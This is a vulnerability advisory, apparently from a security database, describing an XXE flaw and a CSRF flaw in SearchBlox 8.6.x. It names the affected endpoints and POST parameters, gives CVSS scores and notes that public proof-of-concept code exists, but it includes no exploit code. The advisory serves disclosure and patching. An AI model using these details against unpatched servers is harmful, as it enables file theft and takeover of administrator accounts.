Multiple vulnerabilities in SearchBlox



Published: 2018-06-13
Risk Low
Patch available YES
Number of vulnerabilities 2
CVE-ID CVE-2018-11586
CVE-2018-11538
CWE-ID CWE-611
CWE-352
Exploitation vector Network
Public exploit Public exploit code for vulnerability #1 is available.
Public exploit code for vulnerability #2 is available.
Vulnerable software
Subscribe 		SearchBlox
Client/Desktop applications / Other client software

Vendor SearchBlox

Security Bulletin

This security bulletin contains information about 2 vulnerabilities.

1) XXE attack

EUVDB-ID: #VU13328

Risk: Low

CVSSv3.1: 6.6 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C]

CVE-ID: CVE-2018-11586

CWE-ID: CWE-611 - Improper Restriction of XML External Entity Reference ('XXE')

Exploit availability: Yes

Description

The vulnerability allows a remote attacker to conduct XXE attack on the target system.

The vulnerability exists due to XML external entity vulnerability in api/rest/status. A remote attacker can submit a specially crafted DTD in an XML request and read arbitrary files or conduct server-side request forgery (SSRF) attacks.

Mitigation

Install update from vendor's website.

Vulnerable software versions

SearchBlox: 8.6.7

External links

http://gurelahmet.com/searchblox-8-6-7-out-of-band-xml-external-entity-oob-xxe-cve-2018-11586/


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.

2) Cross-site request forgery

EUVDB-ID: #VU13335

Risk: Low

CVSSv3.1: 6.5 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C]

CVE-ID: CVE-2018-11538

CWE-ID: CWE-352 - Cross-Site Request Forgery (CSRF)

Exploit availability: Yes

Description

The vulnerability allows a remote attacker to perform CSRF attack.

The weakness exists in servlet/UserServlet due to insufficient validation of user-suppliedinput passed via the u_name, u_passwd1, u_passwd2, role, and X-XSRF-TOKEN POST parameters. A remote attacker can create a specially crafted HTML page or URL, trick the victim into visiting it, bypass CSRF Token gain access to the system and perform arbitrary actions.

Mitigation

Install update from vendor's website.

Vulnerable software versions

SearchBlox: 8.6.6

External links

http://gurelahmet.com/cve-2018-11538-csrf-privilege-escalation-creation-of-an-administrator-account-on-searchblox-8-6-6/


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.



###SIDEBAR###